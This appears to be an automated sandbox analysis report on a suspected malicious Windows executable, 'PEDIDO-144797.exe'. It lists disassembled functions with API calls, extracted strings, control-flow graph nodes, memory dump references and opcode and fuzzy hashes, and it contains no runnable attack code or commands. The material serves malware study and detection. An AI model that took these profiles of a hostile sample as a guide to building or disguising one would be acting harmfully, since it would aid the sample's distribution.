                                                                                                                                          Function 00403A29 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,77762EE0,00403A00,77763420,004037FF,00000006,?,00000006,00000008,0000000A), ref: 00403A43
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00403A4A
                                                                                                                                          Strings
                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A3B
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                          • API String ID: 1100898210-3355392842
                                                                                                                                          • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                                          • Instruction ID: 78aecf43d79df039942bc1d46619d1d902388d1bf991e2316d5006033f35a71e
                                                                                                                                          • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                                          • Instruction Fuzzy Hash: D9E08C32A000205BC6229F45ED04B5E7B6C6F48B22F0A023AE8C07B26087745C82CF88
                                                                                                                                          Function 00405CCD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PEDIDO-144797.exe,C:\Users\user\Desktop\PEDIDO-144797.exe,80000000,00000003), ref: 00405CD3
                                                                                                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PEDIDO-144797.exe,C:\Users\user\Desktop\PEDIDO-144797.exe,80000000,00000003), ref: 00405CE3
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                          • API String ID: 2709904686-3370423016
                                                                                                                                          • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                                                                          • Instruction ID: 4c3d9e560c0c996ae094f7ef7b1b4ed865fc8cc67bffad09b41611580a74fc2a
                                                                                                                                          • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                                                                          • Instruction Fuzzy Hash: 03D05EB2414A209AD3126704DD01D9F73A8EF12314746442AE841A6161E7785C918AAC
                                                                                                                                          Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                                          Function 00405E07 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E2F
                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E40
                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                          • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                          • Instruction ID: dc3323509655add47458b7bfdc28b409d7665b879035d0867add309d4545c2bc
                                                                                                                                          • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                          • Instruction Fuzzy Hash: 89F06236104518EFC7029BA5DD40D9FBBA8EF06354B2540BAE980F7211D674DF01AB99

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:0%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:100%
                                                                                                                                          Total number of Nodes:1
                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                          execution_graph 46246 326e2b90 LdrInitializeThunk

                                                                                                                                          Executed Functions

                                                                                                                                          Function 326E34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 4 326e34e0-326e34ec LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 29eb848ae944e40f42bf0bbc0020cbecfa30b94e1ea59982d9da85d509d4ea6c
                                                                                                                                          • Instruction ID: 8bdc4b6d0b2fd5b12e00736643169c39608d7244a3250df445b20e31a4304daf
                                                                                                                                          • Opcode Fuzzy Hash: 29eb848ae944e40f42bf0bbc0020cbecfa30b94e1ea59982d9da85d509d4ea6c
                                                                                                                                          • Instruction Fuzzy Hash: FD90023160520412DD00655C571471620054BD0211F61D856A0524928DC7A6896575A2
                                                                                                                                          Function 326E2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1 326e2bc0-326e2bcc LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: ed7d3b0dfc94d3e7ec5db12ec0619ebf64a0705dde9a315479cb197e265b3d5a
                                                                                                                                          • Instruction ID: 46962f79e8601e565172ef6dd4946216a8076b4320625e560e4d5391755667f4
                                                                                                                                          • Opcode Fuzzy Hash: ed7d3b0dfc94d3e7ec5db12ec0619ebf64a0705dde9a315479cb197e265b3d5a
                                                                                                                                          • Instruction Fuzzy Hash: BC90023120110412DD00699C670865610054BE0311F51E456A5124915EC67688A57131
                                                                                                                                          Function 326E2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 0 326e2b90-326e2b9c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 6bf043d9f87eaf3a449555eef62ec6a4411026f3eb621cdb28489937bc5c873b
                                                                                                                                          • Instruction ID: 95cde7a0f3c77eee0c18841d772b299a4aaf04fae6cb9f23314fb1d86003b144
                                                                                                                                          • Opcode Fuzzy Hash: 6bf043d9f87eaf3a449555eef62ec6a4411026f3eb621cdb28489937bc5c873b
                                                                                                                                          • Instruction Fuzzy Hash: 8E90023120118812DD10655C970475A10054BD0311F55D856A4524A18DC6A688A57121
                                                                                                                                          Function 326E2EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 3 326e2eb0-326e2ebc LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 5907d60f186e7222f94c4a83a6d351250750ae3472c8f11a0a7a29aefb4dfc1e
                                                                                                                                          • Instruction ID: 3c87a3aa20816252be9b924d8a334e149e9df08e7a3e53b25ed76b326c579db9
                                                                                                                                          • Opcode Fuzzy Hash: 5907d60f186e7222f94c4a83a6d351250750ae3472c8f11a0a7a29aefb4dfc1e
                                                                                                                                          • Instruction Fuzzy Hash: 5E90023120150412DD00655C5B1471B10054BD0312F51D456A1264915DC63688657571
                                                                                                                                          Function 326E2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 2 326e2d10-326e2d1c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: c403b65493fdb127e3c7605e2e5cca498738786f4d984a86a937214628c91457
                                                                                                                                          • Instruction ID: d0fca87045f15aa7fb7d69dffe37045907ba3510919389ea194dd68d78349e0c
                                                                                                                                          • Opcode Fuzzy Hash: c403b65493fdb127e3c7605e2e5cca498738786f4d984a86a937214628c91457
                                                                                                                                          • Instruction Fuzzy Hash: 5590023120110423DD11655C570471710094BD0251F91D857A0524918DD6678966B121

                                                                                                                                          Non-executed Functions

                                                                                                                                          Function 32749060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 182 32749060-327490a9 183 327490f8-32749107 182->183 184 327490ab-327490b0 182->184 185 327490b4-327490ba 183->185 186 32749109-3274910e 183->186 184->185 188 32749215-3274923d call 326e8f40 185->188 189 327490c0-327490e4 call 326e8f40 185->189 187 32749893-327498a7 call 326e4b50 186->187 196 3274925c-32749292 188->196 197 3274923f-3274925a call 327498aa 188->197 198 327490e6-327490f3 call 327692ab 189->198 199 32749113-327491b4 GetPEB call 3274d7e5 189->199 202 32749294-32749296 196->202 197->202 210 327491fd-32749210 RtlDebugPrintTimes 198->210 208 327491b6-327491c4 199->208 209 327491d2-327491e7 199->209 202->187 206 3274929c-327492b1 RtlDebugPrintTimes 202->206 206->187 216 327492b7-327492be 206->216 208->209 211 327491c6-327491cb 208->211 209->210 212 327491e9-327491ee 209->212 210->187 211->209 214 327491f0 212->214 215 327491f3-327491f6 212->215 214->215 215->210 216->187 218 327492c4-327492df 216->218 219 327492e3-327492f4 call 3274a388 218->219 222 32749891 219->222 223 327492fa-327492fc 219->223 222->187 223->187 224 32749302-32749309 223->224 225 3274947c-32749482 224->225 226 3274930f-32749314 224->226 229 3274961c-32749622 225->229 230 32749488-327494b7 call 326e8f40 225->230 227 32749316-3274931c 226->227 228 3274933c 226->228 227->228 231 3274931e-32749332 227->231 232 32749340-32749391 call 326e8f40 RtlDebugPrintTimes 228->232 234 32749674-32749679 229->234 235 32749624-3274962d 229->235 247 327494f0-32749505 230->247 248 327494b9-327494c4 230->248 238 32749334-32749336 231->238 239 32749338-3274933a 231->239 232->187 274 32749397-3274939b 232->274 236 3274967f-32749687 234->236 237 32749728-32749731 234->237 235->219 242 32749633-3274966f call 326e8f40 235->242 243 32749693-327496bd call 32748093 236->243 244 32749689-3274968d 236->244 237->219 246 32749737-3274973a 237->246 238->232 239->232 267 32749869 242->267 271 327496c3-3274971e call 326e8f40 RtlDebugPrintTimes 243->271 272 32749888-3274988c 243->272 244->237 244->243 253 32749740-3274978a 246->253 254 327497fd-32749834 call 326e8f40 246->254 250 32749507-32749509 247->250 251 32749511-32749518 247->251 255 327494c6-327494cd 248->255 256 327494cf-327494ee 248->256 258 3274950f 250->258 259 3274950b-3274950d 250->259 260 3274953d-3274953f 251->260 264 32749791-3274979e 253->264 265 3274978c 253->265 284 32749836 254->284 285 3274983b-32749842 254->285 255->256 266 32749559-32749576 RtlDebugPrintTimes 256->266 258->251 259->251 275 32749541-32749557 260->275 276 3274951a-32749524 260->276 268 327497a0-327497a3 264->268 269 327497aa-327497ad 264->269 265->264 266->187 288 3274957c-3274959f call 326e8f40 266->288 270 3274986d 267->270 268->269 279 327497af-327497b2 269->279 280 327497b9-327497fb 269->280 278 32749871-32749886 RtlDebugPrintTimes 270->278 271->187 314 32749724 271->314 272->219 286 3274939d-327493a5 274->286 287 327493eb-32749400 274->287 275->266 281 32749526 276->281 282 3274952d 276->282 278->187 278->272 279->280 280->278 281->275 290 32749528-3274952b 281->290 292 3274952f-32749531 282->292 284->285 293 32749844-3274984b 285->293 294 3274984d 285->294 295 327493a7-327493d0 call 32748093 286->295 296 327493d2-327493e9 286->296 289 32749406-32749414 287->289 311 327495a1-327495bb 288->311 312 327495bd-327495d8 288->312 298 32749418-3274946f call 326e8f40 RtlDebugPrintTimes 289->298 290->292 300 32749533-32749535 292->300 301 3274953b 292->301 302 32749851-32749857 293->302 294->302 295->298 296->289 298->187 318 32749475-32749477 298->318 300->301 307 32749537-32749539 300->307 301->260 308 3274985e-32749864 302->308 309 32749859-3274985c 302->309 307->260 308->270 315 32749866 308->315 309->267 316 327495dd-3274960b RtlDebugPrintTimes 311->316 312->316 314->237 315->267 316->187 320 32749611-32749617 316->320 318->272 320->246
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: $ $0
                                                                                                                                          • API String ID: 3446177414-3352262554
                                                                                                                                          • Opcode ID: 46841807dc2d1fd76d538af668ca9ba225872c99a540225cfdf2a9e7bd9f67e9
                                                                                                                                          • Instruction ID: 20234382740a35fe8be2d8b8cc694f9edb4f07c63e53aa4708a0f1f474ecee15
                                                                                                                                          • Opcode Fuzzy Hash: 46841807dc2d1fd76d538af668ca9ba225872c99a540225cfdf2a9e7bd9f67e9
                                                                                                                                          • Instruction Fuzzy Hash: 713204B1608381CFE350CF68C984B5BBBE5BF88348F00492EF5999B250DB75E949CB52
                                                                                                                                          Function 3269D2EC Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 774 3269d2ec-3269d32d 775 326fa69c 774->775 776 3269d333-3269d335 774->776 778 326fa6a6-326fa6bf call 3275bd08 775->778 776->775 777 3269d33b-3269d33e 776->777 777->775 779 3269d344-3269d34c 777->779 787 3269d56a-3269d56d 778->787 788 326fa6c5-326fa6c8 778->788 781 3269d34e-3269d350 779->781 782 3269d356-3269d3a1 call 326e5050 call 326e2ab0 779->782 781->782 784 326fa5f6-326fa5fb 781->784 799 3269d3a7-3269d3b0 782->799 800 326fa600-326fa61a call 32697220 782->800 786 3269d5c0-3269d5c8 784->786 790 3269d56f-3269d575 787->790 791 3269d54d-3269d54f 788->791 794 3269d63b-3269d63d 790->794 795 3269d57b-3269d588 GetPEB call 326b3bc0 790->795 791->787 793 3269d551-3269d564 call 326c3262 791->793 793->787 813 326fa6cd-326fa6d2 793->813 801 3269d58d-3269d592 794->801 795->801 806 3269d3ba-3269d3cd call 3269d736 799->806 807 3269d3b2-3269d3b4 799->807 817 326fa61c-326fa61e 800->817 818 326fa624-326fa628 800->818 804 3269d5a1-3269d5a6 801->804 805 3269d594-3269d59d call 326e2a80 801->805 809 3269d5a8-3269d5b1 call 326e2a80 804->809 810 3269d5b5-3269d5ba 804->810 805->804 823 326fa658 806->823 824 3269d3d3-3269d3d7 806->824 807->806 808 326fa630-326fa63b call 3275ad61 807->808 808->806 831 326fa641-326fa653 808->831 809->810 810->786 819 326fa6d7-326fa6db call 326e2a80 810->819 813->787 817->818 825 3269d52e 817->825 818->808 832 326fa6e0 819->832 837 326fa660-326fa662 823->837 829 3269d5cb-3269d623 call 326e5050 call 326e2ab0 824->829 830 3269d3dd-3269d3f7 call 3269d8d0 824->830 828 3269d530-3269d535 825->828 833 3269d549 828->833 834 3269d537-3269d539 828->834 848 3269d642-3269d645 829->848 849 3269d625 829->849 830->837 842 3269d3fd-3269d44e call 326e5050 call 326e2ab0 830->842 831->806 832->832 833->791 834->778 838 3269d53f-3269d543 834->838 837->787 841 326fa668 837->841 838->778 838->833 844 326fa66d 841->844 842->823 854 3269d454-3269d45d 842->854 850 326fa677-326fa67c 844->850 848->825 853 3269d62f-3269d636 849->853 850->794 853->828 854->844 855 3269d463-3269d492 call 326e5050 call 3269d64a 854->855 855->853 860 3269d498-3269d49e 855->860 860->853 861 3269d4a4-3269d4aa 860->861 861->794 862 3269d4b0-3269d4cc GetPEB call 326b5d90 861->862 862->850 865 3269d4d2-3269d4ef call 3269d64a 862->865 868 3269d4f1-3269d4f6 865->868 869 3269d526-3269d52c 865->869 870 3269d4fc-3269d524 call 326c4ca6 868->870 871 326fa681-326fa686 868->871 869->790 869->825 870->869 871->870 872 326fa68c-326fa697 871->872 872->828
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.l2
                                                                                                                                          • API String ID: 0-1596040379
                                                                                                                                          • Opcode ID: 460db15222c613517911fbeb536a592e09d5aeacc95ac5051b16eb11c540d96d
                                                                                                                                          • Instruction ID: f9a8fa8227d06d539238192e869f834ad05f1d9a4cd839bb74183a6891485926
                                                                                                                                          • Opcode Fuzzy Hash: 460db15222c613517911fbeb536a592e09d5aeacc95ac5051b16eb11c540d96d
                                                                                                                                          • Instruction Fuzzy Hash: C5B18AB6508341AFD715DF28C980B9FB7E8AF88758F41492EF985D7241DB70D908CB92
                                                                                                                                          Function 327486C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                          • API String ID: 0-2515994595
                                                                                                                                          • Opcode ID: be1f67843f8cfdb3e71c3a37805793abfa9402aac4cda83d1b977c35beb8cd27
                                                                                                                                          • Instruction ID: c28543b60bb32a88ec1857ca9bfcfa59f56be04d1e947030d7b40ce1f7dea7e8
                                                                                                                                          • Opcode Fuzzy Hash: be1f67843f8cfdb3e71c3a37805793abfa9402aac4cda83d1b977c35beb8cd27
                                                                                                                                          • Instruction Fuzzy Hash: 0351DFB55143199BD326CF18EE41BABB7EDFF85354F00491DBA588B240EB70E604CB92
